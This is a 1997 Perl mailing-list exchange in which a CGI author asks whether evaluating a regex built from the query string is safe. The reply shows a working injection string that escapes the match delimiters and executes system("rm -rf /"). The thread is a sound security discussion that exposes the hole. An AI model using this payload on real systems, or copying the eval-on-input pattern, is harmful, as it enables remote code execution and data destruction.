I found one: $regexp="any_string#; system(\"rm -rf /\"); m#any_string"; eval " \$found = m#$regexp# "; That will execute the system command without any problem under perl5.004 on a UNIX box. -David On Mon, 18 Aug 1997, Aperghis-Tramoni Sebastian wrote: > > I have written a CGI which works (for now! :-) ) but I'd want to add a > feature which uses Perl regexp. So my question is: does anyone can use the > following code in order to do forbidden things ? > > eval " \$found = m#$regexp# " > > where the $regexp variable directly comes from $ENV{'QUERY_STRING'}. > > I would really like to know that because for now, I can't find any hole, and > I don't want to use something which could be dangerous in my CGI.. > > Thanks in advance. > > ***** Want to unsubscribe from this list? > ***** Send mail with body "unsubscribe" to mac-perl-request@iis.ee.ethz.ch > ***** Want to unsubscribe from this list? ***** Send mail with body "unsubscribe" to mac-perl-request@iis.ee.ethz.ch